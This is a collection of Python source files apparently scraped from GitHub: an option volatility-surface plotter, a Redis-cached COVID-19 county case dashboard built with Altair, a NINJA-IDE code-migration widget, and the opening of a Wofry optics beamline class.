[i[0][11:26] for i in data if not i[0].endswith('A')] # 不考虑分红\n for i in range(len(call)):\n call[i] = [j for j in call[i] if j in codes_tmp]\n put[i] = [j for j in put[i] if j in codes_tmp]\n break\n except (exceptions.ConnectionError, exceptions.ConnectTimeout) as e:\n print('连接出错,10秒后重试')\n print(e)\n sleep(10)\n return call, put, ','.join(codes_tmp), dates\n\n\ndef get_data(call, put, all_codes):\n implied_volatility, strike_price, vega, theta, gamma, delta = [], [], [], [], [], []\n for line in requests_get(all_codes):\n implied_volatility.append(float(line[9]))\n vega.append(float(line[8]))\n strike_price.append(float(line[13]))\n theta.append(float(line[7]))\n gamma.append(float(line[6]))\n delta.append(float(line[5]))\n call_implied_volatility, call_strike_price, call_vega, call_theta, call_gamma, call_delta = [], [], [], [], [], []\n put_implied_volatility, put_strike_price, put_vega, put_theta, put_gamma, put_delta = [], [], [], [], [], []\n b = 0\n for i in call:\n len_i = len(i)\n call_implied_volatility.append(implied_volatility[b:b + len_i])\n call_strike_price.append(strike_price[b:b + len_i])\n call_vega.append(vega[b:b + len_i])\n call_theta.append(theta[b:b + len_i])\n call_gamma.append(gamma[b:b + len_i])\n call_delta.append(delta[b:b + len_i])\n b += len_i\n for i in put:\n len_i = len(i)\n put_implied_volatility.append(implied_volatility[b:b + len_i])\n put_strike_price.append(strike_price[b:b + len_i])\n put_vega.append(vega[b:b + len_i])\n put_theta.append(theta[b:b + len_i])\n put_gamma.append(gamma[b:b + len_i])\n put_delta.append(delta[b:b + len_i])\n b += len_i\n return call_strike_price, [call_delta, call_gamma, call_theta, call_vega, call_implied_volatility], \\\n put_strike_price, [put_delta, put_gamma, put_theta, put_vega, put_implied_volatility]\n\n\ndef knockout_small_value(x, y):\n length = len(x)\n new_x = [x[i] for i in range(length) if y[i] > 0.01]\n new_y = [i for i in y if i > 0.01]\n return new_x, new_y\n\n\ndef fit(call_x, call_y, put_x, put_y):\n xx = set()\n for i in call_x:\n xx |= set(i)\n xx = sorted(xx)\n call_y2, put_y2 = [], []\n for i in range(len(call_x)):\n if xx == call_x[i]:\n call_y2.append(call_y[i])\n else:\n new_x, new_y = knockout_small_value(call_x[i], call_y[i])\n tmp = polyval(polyfit(new_x, new_y, 2), xx)\n tmp[tmp < 0.0] = 0.0\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in call_x[i]:\n tmp_y.append(call_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(tmp[index])\n call_y2.append(tmp_y)\n if xx == put_x[i]:\n put_y2.append(put_y[i])\n else:\n new_x, new_y = knockout_small_value(put_x[i], put_y[i])\n tmp = polyval(polyfit(new_x, new_y, 2), xx)\n tmp[tmp < 0.0] = 0.0\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in put_x[i]:\n tmp_y.append(put_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(tmp[index])\n put_y2.append(tmp_y)\n return xx, call_y2, put_y2\n\n\ndef not_fit(call_x, call_y, put_x, put_y):\n xx = set()\n for i in call_x:\n xx |= set(i)\n xx = sorted(xx)\n call_y2, put_y2 = [], []\n for i in range(len(call_x)):\n if xx == call_x[i]:\n call_y2.append(call_y[i])\n else:\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in call_x[i]:\n tmp_y.append(call_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(nan)\n call_y2.append(tmp_y)\n if xx == put_x[i]:\n put_y2.append(put_y[i])\n else:\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in put_x[i]:\n tmp_y.append(put_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(nan)\n put_y2.append(tmp_y)\n return xx, call_y2, put_y2\n\n\ndef update(call_codes, put_codes, all_codes, x, y, yy, surf_call, surf_put, ax_iv_sf_call, ax_iv_sf_put, is_fit):\n azim = AZIM\n while True:\n # sleep(5) # 每隔5秒刷新一次\n sleep(10)\n with update_picture_lock:\n call_x, call_ys, put_x, put_ys = get_data(call_codes, put_codes, all_codes)\n if is_fit:\n xx, call_y2, put_y2 = fit(call_x, call_ys[-1], put_x, put_ys[-1])\n else:\n xx, call_y2, put_y2 = not_fit(call_x, call_ys[-1], put_x, put_ys[-1])\n surf_call.remove()\n azim += 15\n if azim > 360:\n azim -= 360\n ax_iv_sf_call.view_init(ELEV, azim)\n # surf_call = ax_iv_sf_call.plot_surface(x, y, array(call_y2), rstride=1, cstride=1, cmap='rainbow')\n surf_call = ax_iv_sf_call.plot_wireframe(x, y, array(call_y2), rstride=1, cstride=1)\n surf_put.remove()\n ax_iv_sf_put.view_init(ELEV, azim)\n # surf_put = ax_iv_sf_put.plot_surface(x, y, array(put_y2), rstride=1, cstride=1, cmap='rainbow')\n surf_put = ax_iv_sf_put.plot_wireframe(x, y, array(put_y2), rstride=1, cstride=1)\n for index in range(5):\n for i in yy:\n global_ax_lines_call[index]['ax'].lines.remove(global_ax_lines_call[index]['lines'][i])\n global_ax_lines_put[index]['ax'].lines.remove(global_ax_lines_put[index]['lines'][i])\n global_ax_lines_call[index]['lines'] = []\n global_ax_lines_put[index]['lines'] = []\n for index in range(5):\n for i in yy:\n global_ax_lines_call[index]['lines'].append(global_ax_lines_call[index]['ax'].plot(call_x[i], array(call_ys[index][i]), COLORS[i])[0])\n global_ax_lines_put[index]['lines'].append(global_ax_lines_put[index]['ax'].plot(put_x[i], array(put_ys[index][i]), COLORS[i])[0])\n plt.draw()\n\n\ndef main(cate, exchange, underlying, dividend=True, is_fit=True):\n call_codes, put_codes, all_codes, dates = get_codes(cate, exchange, underlying, dividend)\n dates_label = ',,'.join(dates).split(',')\n call_x, call_ys, put_x, put_ys = get_data(call_codes, put_codes, all_codes)\n if is_fit:\n xx, call_y2, put_y2 = fit(call_x, call_ys[-1], put_x, put_ys[-1])\n else:\n xx, call_y2, put_y2 = not_fit(call_x, call_ys[-1], put_x, put_ys[-1])\n yy = list(range(len(call_y2)))\n x, y = meshgrid(xx, yy)\n fig = plt.figure(figsize=(12, 5.7))\n fig.canvas.mpl_connect('button_press_event', lambda event: update_picture_lock.acquire())\n fig.canvas.mpl_connect('button_release_event', lambda event: update_picture_lock.release())\n gs = gridspec.GridSpec(3, 6, figure=fig)\n ylabels = ['Delta', 'Gamma', 'Theta', 'Vega', 'Implied Volatility']\n call_gs = [gs[2:3, :1], gs[2:3, 1:2], gs[2:3, 2:3], gs[1:2, 2:3], gs[:1, 2:3]]\n put_gs = [gs[2:3, 3:4], gs[2:3, 4:5], gs[2:3, 5:6], gs[1:2, 5:6], gs[:1, 5:6]]\n # ---------------------------------------------------------------------------------------------------\n for index in range(5):\n call_ax = fig.add_subplot(call_gs[index])\n for i in yy:\n line, = call_ax.plot(call_x[i], call_ys[index][i], COLORS[i])\n global_ax_lines_call[index]['lines'].append(line)\n call_ax.set_xlabel('Strike Price')\n call_ax.set_ylabel(ylabels[index])\n call_ax.legend(dates, fontsize='xx-small')\n global_ax_lines_call[index]['ax'] = call_ax\n put_ax = fig.add_subplot(put_gs[index])\n for i in yy:\n line, = put_ax.plot(put_x[i], put_ys[index][i], COLORS[i])\n global_ax_lines_put[index]['lines'].append(line)\n put_ax.set_xlabel('Strike Price')\n put_ax.set_ylabel(ylabels[index])\n put_ax.legend(dates, fontsize='xx-small')\n global_ax_lines_put[index]['ax'] = put_ax\n ax_iv_sf_call = fig.add_subplot(gs[:2, :2], projection='3d')\n ax_iv_sf_call.view_init(ELEV, AZIM)\n # surf_call = ax_iv_sf_call.plot_surface(x, y, array(call_y2), rstride=1, cstride=1, cmap='rainbow')\n # print(x.shape, y.shape, array(call_y2).shape)\n surf_call = ax_iv_sf_call.plot_wireframe(x, y, array(call_y2), rstride=1, cstride=1, cmap='rainbow')\n ax_iv_sf_call.set_yticklabels(dates_label)\n ax_iv_sf_call.set_xlabel('Strike Price')\n ax_iv_sf_call.set_ylabel('Expiration Date')\n ax_iv_sf_call.set_zlabel('Implied Volatility')\n ax_iv_sf_call.set_title('Call Option')\n ax_iv_sf_put = fig.add_subplot(gs[:2, 3:5], projection='3d')\n ax_iv_sf_put.view_init(ELEV, AZIM)\n # surf_put = ax_iv_sf_put.plot_surface(x, y, array(put_y2), rstride=1, cstride=1, cmap='rainbow')\n surf_put = ax_iv_sf_put.plot_wireframe(x, y, array(put_y2), rstride=1, cstride=1, cmap='rainbow')\n ax_iv_sf_put.set_yticklabels(dates_label)\n ax_iv_sf_put.set_xlabel('Strike Price')\n ax_iv_sf_put.set_ylabel('Expiration Date')\n ax_iv_sf_put.set_zlabel('Implied Volatility')\n ax_iv_sf_put.set_title('Put Option')\n plt.tight_layout()\n thread = Thread(target=update, args=(call_codes, put_codes, all_codes, x, y, yy, surf_call, surf_put, ax_iv_sf_call, ax_iv_sf_put, is_fit))\n thread.setDaemon(True)\n thread.start()\n plt.show()\n\n\nif __name__ == '__main__':\n category = '50ETF'\n underlying_security = '510050'\n # category = '300ETF'\n # underlying_security = '510300'\n main(cate=category, exchange='null', underlying=underlying_security, dividend=False, is_fit=True)\n","repo_name":"sfl666/option_tools","sub_path":"volatility_surface.py","file_name":"volatility_surface.py","file_ext":"py","file_size_in_byte":12115,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"40"} +{"seq_id":"14898428735","text":"import altair as alt\nimport pandas as pd\nimport numpy as np\nfrom datetime import date\nfrom os import path\nfrom flask import current_app as app\nimport redis, requests, time, pyarrow\n\ndef connect():\n return redis.Redis( host=app.config['REDIS_HOST'], port=app.config['REDIS_PORT'] )\n\ndef fetchData(rconn):\n context = pyarrow.default_serialization_context()\n\n #\n # Check date of main dataframe\n #\n expires = rconn.hget(\"county\",\"expires\")\n if expires and time.time() < float(expires):\n return context.deserialize(rconn.hget(\"county\",\"dataframe\"))\n\n #\n # Fetch new copy\n #\n dt = pd.read_csv(\"https://github.com/nytimes/covid-19-data/blob/master/us-counties.csv?raw=true\")\n dt['dt'] = pd.to_datetime(dt.date,format=\"%Y-%m-%d\")\n\n #\n # Save\n #\n rconn.hset(\"county\",\"dataframe\",context.serialize(dt).to_buffer().to_pybytes())\n rconn.hset(\"county\",\"expires\",str(time.time()+600.0))\n return dt\n\ndef fetchNames(rconn):\n context = pyarrow.default_serialization_context()\n\n if rconn.hexists(\"county\",\"names\"):\n return context.deserialize(rconn.hget(\"county\",\"names\"))\n\n dt = fetchData(rconn)\n counties = dt.filter(items=(\"state\",\"county\")).drop_duplicates()\n\n rconn.hset(\"county\",\"names\",context.serialize(counties).to_buffer().to_pybytes())\n return counties\n\ndef fetchCounty(rconn,state,county):\n context = pyarrow.default_serialization_context()\n\n #\n # Check date of main dataframe\n #\n key = state + \":\" + county \n key_expires = key + \":expires\"\n\n expires = rconn.hget(\"county\", key_expires)\n if expires and time.time() < float(expires):\n return context.deserialize(rconn.hget(\"county\",key))\n\n #\n # Fetch new master data frame\n #\n dt = fetchData(rconn)\n\n #\n # Process and save\n #\n answer = dt[(dt.state==state) & (dt.county==county)].copy()\n answer['days'] = (answer.dt-min(answer.dt[answer.cases>0])).dt.days\n answer['days10'] = (answer.dt-min(answer.dt[answer.cases>9])).dt.days\n answer = answer.sort_values(by=\"days\")\n answer['ddeaths'] = answer.deaths.diff()\n answer['dcases'] = answer.cases.diff()\n\n states = pd.read_csv(path.join(app.config['DATA_DIR'],\"state-abbre.csv\"))\n abbrev = states[states['State']==state]['Code']\n answer['stcode'] = abbrev.iloc[0] if len(abbrev) > 0 else \"?\"\n\n rconn.hset(\"county\",key,context.serialize(answer).to_buffer().to_pybytes())\n rconn.hset(\"county\",key_expires,str(time.time()+600.0))\n return answer\n\ndef fetchPopulationAll(rconn):\n context = pyarrow.default_serialization_context()\n\n #\n # See if we have this cached\n #\n key = 'population'\n serialized = rconn.hget(\"county\",key)\n if serialized:\n return context.deserialize(serialized)\n\n #\n # Process and save\n #\n answer = pd.read_csv(path.join(app.config['DATA_DIR'],\"co-est2019-alldata.csv\"), encoding='Windows-1252')\n answer = answer.filter(items=['CTYNAME','STNAME','POPESTIMATE2019'])\n rconn.hset(\"county\",key,context.serialize(answer).to_buffer().to_pybytes())\n \n return answer\n\ndef fetchPopulation(rconn,state,county):\n all = fetchPopulationAll(rconn)\n\n answer = all[(all['CTYNAME'] == county+\" County\") & (all['STNAME'] == state)]\n if len(answer) == 1:\n return answer['POPESTIMATE2019'].values[0]\n\n #\n # Remove incompatible suffixes\n #\n if county.endswith(\" City\"):\n answer = all[(all['CTYNAME'] == county[:-5]+\" County\") & (all['STNAME'] == state)]\n if len(answer) == 1:\n return answer['POPESTIMATE2019'].values[0]\n\n print(f\"County population not found: '{county}' '{state}'\")\n return None\n\ndef california_county_populations(rconn):\n context = pyarrow.default_serialization_context()\n\n if rconn.hexists(\"county\",\"capop\"):\n return context.deserialize(rconn.hget(\"county\",\"capop\"))\n\n # from https://www.california-demographics.com/counties_by_population\n raw = \"\"\"\n1\tLos Angeles County\t10,098,052\n2\tSan Diego County\t3,302,833\n3\tOrange County\t3,164,182\n4\tRiverside County\t2,383,286\n5\tSan Bernardino County\t2,135,413\n6\tSanta Clara County\t1,922,200\n7\tAlameda County\t1,643,700\n8\tSacramento County\t1,510,023\n9\tContra Costa County\t1,133,247\n10\tFresno County\t978,130\n11\tKern County\t883,053\n12\tSan Francisco County\t870,044\n13\tVentura County\t848,112\n14\tSan Mateo County\t765,935\n15\tSan Joaquin County\t732,212\n16\tStanislaus County\t539,301\n17\tSonoma County\t501,317\n18\tTulare County\t460,477\n19\tSanta Barbara County\t443,738\n20\tSolano County\t438,530\n21\tMonterey County\t433,212\n22\tPlacer County\t380,077\n23\tSan Luis Obispo County\t281,455\n24\tSanta Cruz County\t273,765\n25\tMerced County\t269,075\n26\tMarin County\t260,295\n27\tButte County\t227,075\n28\tYolo County\t214,977\n29\tEl Dorado County\t186,661\n30\tImperial County\t180,216\n31\tShasta County\t179,085\n32\tMadera County\t155,013\n33\tKings County\t150,075\n34\tNapa County\t140,530\n35\tHumboldt County\t135,768\n36\tNevada County\t99,092\n37\tSutter County\t95,872\n38\tMendocino County\t87,422\n39\tYuba County\t75,493\n40\tLake County\t64,148\n41\tTehama County\t63,373\n42\tSan Benito County\t59,416\n43\tTuolumne County\t53,932\n44\tCalaveras County\t45,235\n45\tSiskiyou County\t43,540\n46\tAmador County\t37,829\n47\tLassen County\t31,185\n48\tGlenn County\t27,897\n49\tDel Norte County\t27,424\n50\tColusa County\t21,464\n51\tPlumas County\t18,699\n52\tInyo County\t18,085\n53\tMariposa County\t17,540\n54\tMono County\t14,174\n55\tTrinity County\t12,862\n56\tModoc County\t8,938\n57\tSierra County\t2,930\n58\tAlpine County\t1,146\n\"\"\"\n\n import io\n raw = raw.replace(\" County\",\"\").replace(\",\",\"\")\n ca_pop = pd.read_csv(io.StringIO(raw),sep=\"\\t\",header=None,names=(\"rank\",\"county\",\"pop\"))\n\n rconn.hset(\"county\",\"capop\",context.serialize(ca_pop).to_buffer().to_pybytes())\n return ca_pop\n\n\ndef menu():\n r = connect()\n counties = fetchNames(r)\n names = counties.apply(lambda r: '{}, {}'.format(r.county,r.state), axis=1)\n\n return {\n 'names': names.sort_values(),\n 'default': \"Santa Clara, California\",\n 'default2': \"Harris, Texas\"\n }\n\n#\n# We'll allow the axis to float a little negative, but\n# not too far, otherwise it can get ugly. Fall down to the next unit \n# value, for small statistics.\n#\ndef not_too_negative(quantity,control):\n return [\n max(quantity.min(),-np.ceil(0.05*quantity.max())), \n min(quantity.max(),1.5*control.max())\n ]\n\n#\n# Similar, but for stats per capita, we have continuous\n# values\n#\ndef not_too_negative_continuous(quantity,control):\n return [\n max(quantity.min(),-0.05*quantity.max()), \n min(quantity.max(),1.5*control.max())\n ]\n\ndef simple_plot(code, time):\n r = connect()\n\n parts = code.split(\", \")\n fc = fetchCounty( r, parts[1], parts[0] )\n\n fc['proll'] = fc.dcases.rolling(window=7).mean()\n fc['froll'] = fc.ddeaths.rolling(window=7).mean()\n\n fc = fc[fc.dt >= pd.to_datetime(date(2020,3,1))].filter(\n items=(\"dt\",\"dcases\",\"ddeaths\",\"proll\",\"froll\")\n )\n\n fc['src1'] = \"Daily\"\n fc['src2'] = \"7 day\"\n\n if time > 0:\n fc = fc[fc.dt > pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")]\n\n chart = alt.Chart(fc)\n\n fake_scale = alt.Scale(domain=('Daily','7 day'), range=('lightgrey','blue'))\n\n case_points = chart.mark_line(point=True, clip=True).encode(\n x = alt.X(\"dt:T\",title=\"Date\"),\n y = alt.Y(\n \"dcases:Q\",\n title = \"Cases\",\n scale = alt.Scale(domain=not_too_negative(fc.dcases,fc.proll))\n ),\n color = alt.Color(\"src1\", scale=fake_scale)\n )\n case_average = chart.mark_line(clip=True).encode(\n x = alt.X('dt:T'),\n y = alt.Y('proll:Q'),\n color = alt.Color(\"src2\", scale=fake_scale)\n )\n\n death_points = chart.mark_line(\n point = {\"color\": \"lightgrey\"}, \n color = \"lightgrey\",\n clip = True\n ).encode(\n x = alt.X(\"dt:T\", title=\"Date\"),\n y = alt.Y(\n \"ddeaths:Q\",\n title = \"Fatalities\",\n scale = alt.Scale(domain=not_too_negative(fc.ddeaths,fc.froll))\n ),\n )\n death_average = chart.mark_line(clip=True).encode(\n x = alt.X('dt:T'),\n y = alt.Y('froll:Q')\n )\n\n top = (case_points + case_average).properties(\n width = 500, \n height = 200,\n title = code\n )\n bot = (death_points + death_average).properties(\n width = 500, \n height = 200\n )\n\n return (top & bot).configure_legend(title=None).to_dict()\n\ndef both(time):\n r = connect()\n\n if time > 0:\n dt_start = pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")\n else:\n dt_start = pd.to_datetime(date(2020,3,1))\n\n def fetchHere( r, state, county ):\n answer = fetchCounty( r, state, county )\n answer['name'] = answer['county'] + \", \" + answer['stcode']\n answer['droll'] = answer.dcases.rolling(window=7).mean()\n return answer[answer.dt >= dt_start].filter(items=(\"dt\",\"dcases\",\"droll\",\"name\"))\n\n sa = fetchHere( r, \"Oregon\", \"Marion\" )\n cc = fetchHere( r, \"Massachusetts\", \"Barnstable\" )\n pl = fetchHere( r, \"Oregon\", \"Multnomah\" )\n ha = fetchHere( r, \"Texas\", \"Harris\" )\n\n dt_top = pd.concat((sa,cc,pl))\n\n selection = alt.selection_multi(fields=['name'], bind='legend', empty='none')\n scale = alt.Scale(domain=[dt_start,sa.dt.max()])\n\n top_points = alt.Chart(dt_top).mark_line(point=True, clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.Y(\n \"dcases:Q\", \n title = \"Daily cases, 7 day rolling average\",\n scale = alt.Scale(domain=not_too_negative(dt_top.droll,dt_top.droll))\n ),\n color = alt.Color(\"name:N\"),\n opacity = alt.condition(selection, alt.value(1), alt.value(0))\n )\n\n top_lines = alt.Chart(dt_top).mark_line(clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.Y(\"droll:Q\"),\n color = alt.Color(\"name:N\")\n )\n \n top = (top_points + top_lines).properties(width=500, height=200)\n\n bot_points = alt.Chart(ha).mark_line(point=True, clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.Y(\n \"dcases:Q\", \n title = \"Daily cases, 7 day rolling average\",\n scale = alt.Scale(domain=not_too_negative(ha.droll,ha.droll))\n ),\n color = alt.Color(\"name:N\"),\n opacity = alt.condition(selection, alt.value(1), alt.value(0))\n )\n\n bot_lines = alt.Chart(ha).mark_line(clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.Y(\"droll:Q\"),\n color = alt.Color(\"name:N\")\n )\n \n bot = (bot_points + bot_lines).properties(width=500, height=200)\n\n return (top & bot).add_selection(selection).configure_legend(title=None).to_dict()\n\n\ndef silicon_valley(time):\n r = connect()\n\n if time > 0:\n dt_start = pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")\n else:\n dt_start = pd.to_datetime(date(2020,3,1))\n\n def fetchHere( r, state, county ):\n answer = fetchCounty( r, state, county )\n answer['name'] = answer['county'] + \", \" + answer['stcode']\n answer['droll'] = answer.dcases.rolling(window=7).mean()\n return answer[answer.dt >= dt_start].filter(items=(\"dt\",\"dcases\",\"droll\",\"name\"))\n\n dt = pd.concat((\n fetchHere( r, \"California\", \"Santa Clara\" ),\n fetchHere( r, \"California\", \"Alameda\" )\n ))\n chart = alt.Chart(dt)\n\n selection = alt.selection_multi(fields=['name'], bind='legend', empty='none')\n scale = alt.Scale(domain=[dt_start,dt.dt.max()])\n\n points = chart.mark_line(point=True, clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.X(\n \"dcases:Q\", \n title = \"Daily cases, 7 day rolling average\",\n scale = alt.Scale(domain=not_too_negative(dt.droll,dt.droll))\n ),\n color = alt.Color(\"name:N\"),\n opacity = alt.condition(selection, alt.value(1), alt.value(0))\n )\n\n lines = chart.mark_line(clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.X(\"droll:Q\"),\n color = alt.Color(\"name:N\")\n )\n \n plot = (points+lines).properties(width=500, height=300)\n\n return plot.add_selection(selection).configure_legend(title=None).to_dict()\n\n\n\ndef compare_plot(code1, code2, time):\n r = connect()\n\n if time > 0:\n dt_start = pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")\n else:\n dt_start = pd.to_datetime(date(2020,3,1))\n\n def fetchHere( r, code ):\n parts = code.split(\", \")\n pop = fetchPopulation(r, parts[1], parts[0])\n if pop is None: return None\n answer = fetchCounty(r, parts[1], parts[0])\n answer['name'] = answer['county'] + \", \" + answer['stcode']\n answer['croll'] = answer.dcases.rolling(window=7).mean()*100000/pop\n answer['droll'] = answer.ddeaths.rolling(window=7).mean()*100000/pop\n return answer[answer.dt >= dt_start].filter(items=(\"dt\",\"croll\",\"droll\",\"name\"))\n\n dt = pd.concat((\n fetchHere( r, code1 ),\n fetchHere( r, code2 ),\n ))\n chart = alt.Chart(dt)\n\n selection = alt.selection_multi(fields=['name'], bind='legend')\n scale = alt.Scale(domain=[dt_start,dt.dt.max()])\n\n top = chart.mark_line(clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.X(\n \"croll:Q\", \n title = \"Cases per 100,000, 7 day rolling average\",\n scale = alt.Scale(domain=not_too_negative_continuous(dt.croll,dt.croll))\n ),\n color = alt.Color(\"name:N\"),\n opacity = alt.condition(selection, alt.value(1), alt.value(0.2))\n ).properties(width=500, height=200)\n\n bot = chart.mark_line(clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.X(\n \"droll:Q\", \n title = \"Fatalities per 100,000, 7 day rolling average\",\n scale = alt.Scale(domain=not_too_negative_continuous(dt.droll,dt.droll))\n ),\n color = alt.Color(\"name:N\"),\n opacity = alt.condition(selection, alt.value(1), alt.value(0.2))\n ).properties(width=500, height=200)\n\n return (top & bot).add_selection(selection).configure_legend(title=None).to_dict()\n\n\ndef california_bar(percapital=False):\n r = connect()\n dt = fetchData(r)\n dtca = dt[dt.state==\"California\"].groupby(\"county\").apply(\n lambda a: max(a.sort_values(by=\"dt\").cases.diff()[-7:].sum(),0)\n ).reset_index()\n dtca = dtca.rename(columns={0:\"case7\"})\n\n if percapital:\n pop = california_county_populations(r)\n dtca = dtca.merge(pop,on=\"county\")\n dtca['cf7'] = 100000*dtca.case7/dtca['pop']\n answer = alt.Chart(dtca).mark_bar().encode(\n x = alt.X('cf7:Q', title=\"New cases per 100,000, last 7 days\"),\n y = alt.Y('county:N', title=\"County\")\n )\n else:\n answer = alt.Chart(dtca).mark_bar().encode(\n x = alt.X('case7:Q', title=\"New cases, last 7 days\"),\n y = alt.Y('county:N', title=\"County\")\n )\n\n return answer.properties(width=300, height=600).to_dict()\n\n\ndef harris_vs_santa_clara(time):\n return compare_plot( 'Santa Clara, California', 'Harris, Texas', time)\n","repo_name":"dwilliams-github/covidweb","sub_path":"server/drivers/county.py","file_name":"county.py","file_ext":"py","file_size_in_byte":15266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72988652601","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of NINJA-IDE (http://ninja-ide.org).\n#\n# NINJA-IDE is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# any later version.\n#\n# NINJA-IDE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with NINJA-IDE; If not, see .\nfrom __future__ import absolute_import\n\nfrom PyQt4.QtGui import QWidget\nfrom PyQt4.QtGui import QListWidget\nfrom PyQt4.QtGui import QListWidgetItem\nfrom PyQt4.QtGui import QLabel\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QVBoxLayout\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QSpacerItem\nfrom PyQt4.QtGui import QSizePolicy\nfrom PyQt4.QtGui import QPlainTextEdit\nfrom PyQt4.QtGui import QTextCursor\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtCore import SIGNAL\n\nfrom ninja_ide.gui.main_panel import main_container\n\n\nclass MigrationWidget(QWidget):\n\n def __init__(self):\n super(MigrationWidget, self).__init__()\n self._migration = {}\n vbox = QVBoxLayout(self)\n lbl_title = QLabel(self.tr(\"Current code:\"))\n self.current_list = QListWidget()\n lbl_suggestion = QLabel(self.tr(\"Suggested changes:\"))\n self.suggestion = QPlainTextEdit()\n self.suggestion.setReadOnly(True)\n\n self.btn_apply = QPushButton(self.tr(\"Apply change!\"))\n hbox = QHBoxLayout()\n hbox.addSpacerItem(QSpacerItem(1, 0, QSizePolicy.Expanding))\n hbox.addWidget(self.btn_apply)\n\n vbox.addWidget(lbl_title)\n vbox.addWidget(self.current_list)\n vbox.addWidget(lbl_suggestion)\n vbox.addWidget(self.suggestion)\n vbox.addLayout(hbox)\n\n self.connect(self.current_list,\n SIGNAL(\"itemClicked(QListWidgetItem*)\"), self.load_suggestion)\n self.connect(self.btn_apply, SIGNAL(\"clicked()\"), self.apply_changes)\n\n def apply_changes(self):\n lineno = int(self.current_list.currentItem().data(Qt.UserRole))\n lines = self._migration.migration_data[lineno][0].split('\\n')\n remove = -1\n code = ''\n for line in lines:\n if line.startswith('-'):\n remove += 1\n elif line.startswith('+'):\n code += '%s\\n' % line[1:]\n\n editorWidget = main_container.MainContainer().get_actual_editor()\n block_start = editorWidget.document().findBlockByLineNumber(lineno)\n block_end = editorWidget.document().findBlockByLineNumber(\n lineno + remove)\n cursor = editorWidget.textCursor()\n cursor.setPosition(block_start.position())\n cursor.setPosition(block_end.position(), QTextCursor.KeepAnchor)\n cursor.movePosition(QTextCursor.EndOfLine, QTextCursor.KeepAnchor)\n cursor.insertText(code[:-1])\n\n def load_suggestion(self, item):\n lineno = int(item.data(Qt.UserRole))\n lines = self._migration.migration_data[lineno][0].split('\\n')\n code = ''\n for line in lines:\n if line.startswith('+'):\n code += '%s\\n' % line[1:]\n self.suggestion.setPlainText(code)\n editorWidget = main_container.MainContainer().get_actual_editor()\n if editorWidget:\n editorWidget.jump_to_line(lineno)\n editorWidget.setFocus()\n\n def refresh_lists(self, migration):\n self._migration = migration\n self.current_list.clear()\n base_lineno = -1\n for lineno in sorted(migration.migration_data.keys()):\n linenostr = 'L%s\\n' % str(lineno + 1)\n data = migration.migration_data[lineno]\n lines = data[0].split('\\n')\n if base_lineno == data[1]:\n continue\n base_lineno = data[1]\n message = ''\n for line in lines:\n if line.startswith('-'):\n message += '%s\\n' % line\n item = QListWidgetItem(linenostr + message)\n item.setToolTip(linenostr + message)\n item.setData(Qt.UserRole, lineno)\n self.current_list.addItem(item)\n\n def clear(self):\n \"\"\"\n Clear the widget\n \"\"\"\n self.current_list.clear()\n self.suggestion.clear()\n","repo_name":"AlexaProjects/Alexa2","sub_path":"ALEXA-IDE/core/ninja_ide/gui/explorer/migration_lists.py","file_name":"migration_lists.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"12189491128","text":"#\n# runs using \"WofrySuperBeamline\" with wofry wavefronts\n#\n\n\nfrom orangecontrib.comsyl.util.CompactAFReader import CompactAFReader\n# from CompactAFReader import CompactAFReader\n\nimport numpy\n\n\nfrom srxraylib.plot.gol import plot_image, plot\n\nfrom wofry.propagator.propagators2D.fresnel_zoom_xy import FresnelZoomXY2D\nfrom wofry.propagator.propagator import PropagationManager\n\n\nfrom wofry.propagator.propagator import PropagationElements, PropagationParameters\nfrom syned.beamline.beamline_element import BeamlineElement\nfrom syned.beamline.element_coordinates import ElementCoordinates\nfrom wofry.beamline.optical_elements.ideal_elements.screen import WOScreen\nfrom wofry.beamline.optical_elements.ideal_elements.lens import WOIdealLens\nfrom wofry.beamline.optical_elements.absorbers.slit import WOSlit\n\nfrom wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D\n\nfrom syned.beamline.shape import Rectangle\n\nclass WofrySuperBeamline(object):\n def __init__(self):\n self._beamline_elements = []\n self._propagator_handlers = []\n self._propagator_specific_parameteres = []\n\n self._initialize_propagator()\n\n def add_element(self,\n beamline_element=BeamlineElement(),\n propagator_handler=\"FRESNEL_ZOOM_XY_2D\",\n propagator_specific_parameters={'shift_half_pixel':1,'magnification_x':1.0,'magnification_y':1.0},\n ):\n 